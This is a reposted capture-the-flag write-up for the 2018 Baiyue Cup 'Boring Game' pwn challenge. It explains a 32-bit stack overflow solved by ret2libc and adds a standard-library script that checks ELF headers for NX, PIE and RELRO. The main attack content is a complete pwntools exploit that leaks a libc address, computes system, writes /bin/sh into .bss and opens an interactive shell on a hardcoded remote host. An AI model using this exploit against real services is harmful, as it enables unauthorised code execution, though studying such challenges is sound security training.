2018 Baiyue Cup (百越杯) pwn: Boring Game write-up

Looking at the challenge, a libc library is provided with it, so this should be a ret2libc exercise.

First, load the pwn binary into IDA.

There is an obvious stack overflow vulnerability.

The program is 32-bit, and only NX protection is enabled.
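The "only NX enabled" observation is the kind of header-level check tools such as checksec perform; the script below is an added illustration, not part of the original write-up, that does that check with only the Python standard library. The names elf32_protections and build_sample_elf32 are chosen here, and the image it inspects by default is a constructed header-only sample rather than the challenge binary; stack canaries are left out because detecting them needs the symbol table, not just the program headers.

```python
import struct
import sys

# Program-header types, segment flags and file types from the ELF spec
PT_GNU_STACK, PT_GNU_RELRO = 0x6474e551, 0x6474e552
PF_X, PF_W, PF_R = 1, 2, 4
ET_EXEC, ET_DYN = 2, 3

def elf32_protections(data):
    """Report NX / PIE / RELRO for an ELF32 image from its headers alone
    (canary detection needs the symbol table and is out of scope here)."""
    if data[:4] != b"\x7fELF" or data[4] != 1:      # EI_CLASS == 1 means 32-bit
        raise ValueError("not a 32-bit ELF")
    end = "<" if data[5] == 1 else ">"               # EI_DATA: 1 little, 2 big
    e_type, = struct.unpack_from(end + "H", data, 16)
    e_phoff, = struct.unpack_from(end + "I", data, 28)
    e_phentsize, e_phnum = struct.unpack_from(end + "HH", data, 42)
    # Without a PT_GNU_STACK header the i386 kernel gives an executable stack
    nx, relro = False, False
    for i in range(e_phnum):
        phdr = struct.unpack_from(end + "8I", data, e_phoff + i * e_phentsize)
        p_type, p_flags = phdr[0], phdr[6]
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            relro = True
    return {"bits": 32, "nx": nx, "pie": e_type == ET_DYN, "relro": relro}

def build_sample_elf32(stack_flags, e_type=ET_EXEC, with_relro=False):
    """Constructed header-only ELF32 image (no code) used to exercise the check."""
    phdrs = [(1, 0, 0x08048000, 0x08048000, 0x1000, 0x1000, PF_R | PF_X, 0x1000),
             (PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 16)]
    if with_relro:
        phdrs.append((PT_GNU_RELRO, 0, 0x08049000, 0x08049000, 0x100, 0x100, PF_R, 1))
    ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8   # 32-bit, LE, version 1
    ehdr = ident + struct.pack("<HHIIIIIHHHHHH", e_type, 3, 1, 0x08048400,
                               52, 0, 0, 52, 32, len(phdrs), 40, 0, 0)
    return ehdr + b"".join(struct.pack("<8I", *p) for p in phdrs)

if __name__ == "__main__":
    # Check a real file if one is given, else the constructed "only NX" sample
    if len(sys.argv) > 1:
        data = open(sys.argv[1], "rb").read()
    else:
        data = build_sample_elf32(PF_R | PF_W)
    for name, on in elf32_protections(data).items():
        print("%-6s %s" % (name, on))
```

A binary that reports nx=True, pie=False, relro=False is exactly the situation the write-up relies on: the stack is not executable, but PLT, GOT and function addresses are fixed, which is why ret2libc works here.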

Exploitation approach:

1. Leak the real address of __libc_start_main: padding + write_plt + game_addr + 1 + GOT(__libc_start_main) + 4

2. Then compute the real address of system from the offset in the libc library

You can see that the offset is 0x22860.


3. Write /bin/sh into the bss segment. Here I need a gadget (pop_pop_pop_ret), which I found with ROPgadget.py

You can see that the pppr address is 0x080487a9

4. Call system and get a shell

from pwn import *
#context.log_level = 'debug'

io = remote('117.50.59.220', 12345)
elf = ELF('./pwn')
write_plt = elf.plt['write']
read_plt = elf.plt['read']
game_addr = elf.symbols['game']
bss = elf.bss()
system_off = 0x22860      # system - __libc_start_main in the provided libc
pppr = 0x080487a9         # pop; pop; pop; ret gadget found with ROPgadget

# Stage 1: write(1, GOT(__libc_start_main), 4) leaks the real address,
# then return into game() so the buffer can be overflowed a second time
io.recvuntil("your name ?\n")
payload = 'A'*88
payload += p32(write_plt) + p32(game_addr)
payload += p32(1) + p32(elf.got['__libc_start_main']) + p32(4)
io.sendline(payload)
io.recv()
io.sendline('1111')
io.recvuntil('\n')
io.recvuntil('\n')
libc_start_main = u32(io.recv(4))

print(hex(libc_start_main))

io.recvuntil("your name ?\n")

system = libc_start_main + system_off

# Stage 2: read(0, bss, 8) stores "/bin/sh" in .bss, pppr pops the three
# arguments off the stack, then system(bss) runs
payload = 'A'*88
payload += p32(read_plt) + p32(pppr) + p32(0) + p32(bss) + p32(8)
# write "/bin/sh" into the bss segment
payload += p32(system) + p32(game_addr) + p32(bss)
# call system

io.sendline(payload)
io.recv()
io.sendline('1111')
io.recvuntil('\n')
io.recvuntil('\n')

io.sendline('/bin/sh\x00')

io.interactive()


Reposted from blog.csdn.net/qq742762377/article/details/84771467